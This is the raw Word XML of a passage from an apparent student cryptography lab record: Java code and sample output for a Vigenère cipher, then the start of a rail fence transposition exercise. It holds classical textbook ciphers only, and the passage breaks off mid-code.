    <w:p w14:paraId="11C8F6D6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="41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65B23007" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="202"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>res</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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(char)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>((c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key.charAt(j)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'A')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26 +</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'A'); 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++j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE976E6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>key.length();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A834726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594D3E5E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="202"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035E7385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598260D9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="89"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79CA5320" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="4139" w:hanging="279"/>
      </w:pPr>
      <w:r>
        <w:t>static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decode(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>text,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11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key)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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String res = "";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E3DAD9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">text = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>text.toUpperCase();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4FAA25" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="917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text.length();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 xml:space="preserve">{ char </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743F3C2F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198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text.charAt(i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F4C2E6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(c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'Z')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6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spacing w:val="-2"/>
        </w:rPr>
        <w:t>continue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5B3B8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272C5C3B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr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DB1AB9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="71"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>res</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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(char)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>((c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key.charAt(j)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26)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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26 +</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>'A');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++j</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D1C7F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1198"/>
      </w:pPr>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>key.length();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595B268D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18E2D713" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="245"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>res;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5161C44D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="8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2EB493FE" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="83"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609E3ED4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="917" w:hanging="279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1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java.lang.Exception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"VIGENERECIPHER";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DD36C4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="40"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5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"SecurityLaboratory";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8AB853" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:tabs>
          <w:tab w:val="left" w:leader="hyphen" w:pos="8814"/>
        </w:tabs>
        <w:spacing w:before="3"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>System.out.println("Simulating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Vigenere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cipher\n</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACE07B0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="3"/>
        <w:ind w:left="917" w:right="3701"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Input Message : " + msg); String enc = encode(msg,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>key);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>System.out.println("Encrypted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13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: " + enc);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D09EC57" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="41"/>
        <w:ind w:left="917"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("Decrypted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decode(enc,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>key));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC93C2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="7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2D7D3E43" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="271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38CA6070" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="245"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46E28932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7BB61B34" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="36"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Simulating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Vigenere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143E8424" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7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1CF8DC3" wp14:editId="327E246B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>129822</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1421765" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom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765">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1421638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CE1" id="Graphic 154" o:spid="_x0000_s1026" style="position:absolute;margin-left:1in;margin-top:10.2pt;width:111.9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99FgIAAF4EAAAOAAAAZHJzL2Uyb0RvYy54bWysVE1v2zAMvQ/YfxB0X5yk6weMOMXQoMOA&#10;oivQFDsrshwbk0WNVGLn34+S4yTrbsN8EEjxiXrko7y471sr9gapAVfI2WQqhXEaysZtC/m2fvx0&#10;JwUF5UplwZlCHgzJ++XHD4vO52YONdjSoOAkjvLOF7IOwedZRro2raIJeOM4WAG2KrCL26xE1XH2&#10;1mbz6fQm6wBLj6ANEe+uhqBcpvxVZXT4XlVkgrCFZG4hrZjWTVyz5ULlW1S+bvSRhvoHFq1qHF96&#10;SrVSQYkdNn+lahuNQFCFiYY2g6pqtEk1cDWz6btqXmvlTaqFm0P+1Cb6f2n18/7Vv2CkTv4J9E/i&#10;jmSdp/wUiQ4dMX2FbcQycdGnLh5OXTR9EJo3Z5/ns9ubayk0x2bz29TkTOXjWb2j8NVAyqP2TxQG&#10;DcrRUvVo6d6NJrKSUUObNAxSsIYoBWu4GTT0KsRzkVw0RXcmEvda2Js1pGh4x5ypnaPWXaJiKTdX&#10;PMJjlYwdEGzEa7hXg5GuZvuyOOsSi6vZ9V2aDQLblI+NtZEG4XbzYFHsVZzM9MVCOMUfMI8UVorq&#10;AUcHis4RaN1RqkGdqNMGysMLio4HupD0a6fQSGG/OZ6YOP2jgaOxGQ0M9gHSG0k94lvX/Q+FXkQC&#10;hQws7jOM86jyUbdY/QkbTzr4sgtQNVHUNEYDo6PDQ5xKPD64+Eou/YQ6/xaWvwEAAP//AwBQSwME&#10;FAAGAAgAAAAhAEKtED7fAAAACQEAAA8AAABkcnMvZG93bnJldi54bWxMj81OwzAQhO9IvIO1SNyo&#10;nTSENsSpEKJI9ELpz91NliQiXkex26Zvz/YEx5kdzX6TL0bbiRMOvnWkIZooEEilq1qqNey2y4cZ&#10;CB8MVaZzhBou6GFR3N7kJqvcmb7wtAm14BLymdHQhNBnUvqyQWv8xPVIfPt2gzWB5VDLajBnLred&#10;jJVKpTUt8YfG9PjaYPmzOVoN+/fPdbzamvl0qd4eP9Q+wss60vr+bnx5BhFwDH9huOIzOhTMdHBH&#10;qrzoWCcJbwkaYpWA4MA0fZqDOFyNFGSRy/8Lil8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+&#10;AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA&#10;ACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA&#10;ACEAYygvfRYCAABeBAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEAQq0QPt8AAAAJAQAADwAAAAAAAAAAAAAAAABwBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAHwFAAAAAA==&#10;" path="m,l1421638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D60226F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="138"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C15CF7F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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SecurityLaboratory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC60670" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="4861"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Encrypted Message</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">: NMIYEMKCNIQVVROWXC </w:t>
      </w:r>
      <w:r>
        <w:t>Decrypted Message : SECURITYLABORATORY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F1E595" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19015860" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A82D25" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45D8CF37" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2992449A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B5E96B1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="252"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26C800D5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61D4C105" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="34"/>
        <w:ind w:left="360" w:right="783" w:firstLine="719"/>
      </w:pPr>
      <w:r>
        <w:t>Thus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vigenere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10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decryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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 implemented and the output verified successfully.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FDCE42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DE93F7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6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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transposition </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDF4A56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800"/>
        </w:tabs>
        <w:spacing w:before="2" w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Rail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> fence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A33BCC1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1800"/>
        </w:tabs>
        <w:spacing w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>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Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDD072A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="241"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4368A1EF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="534" w:right="532"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>27a).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Rail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Fence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Cipher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Transposition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Technique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20193933" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B4182C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1" w:line="274" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520FFDC4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="1080" w:right="783"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14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decryption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fence</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">transposition </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>technique.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A87215F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="43"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D1809D6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>ALGORITHM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:color w:val="365F91"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3E25CA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="53" w:line="230" w:lineRule="auto"/>
        <w:ind w:right="737"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>In the rail fence cipher, the plaintext is written downwards and diagonally on successive "rails" of an imaginary fence, then moving up when we reach the bottom rail.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113CA86D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="13" w:line="232" w:lineRule="auto"/>
        <w:ind w:right="1098"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>When we reach the top rail, the message is written downwards again until the whole plaintext is written out.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F16229B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>rows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3A794F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="47"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314CC635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695CB87E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="251EA06D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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railFenceCipher.java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FD4998" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>railfenceCipherHelper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD1772" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="3"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D795857" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="231"/>
        <w:ind w:left="638"/>
      </w:pPr>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>depth;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233ED8F9" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D169A5B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="917" w:right="3449" w:hanging="279"/>
      </w:pPr>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>encode(String</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>msg,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depth)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
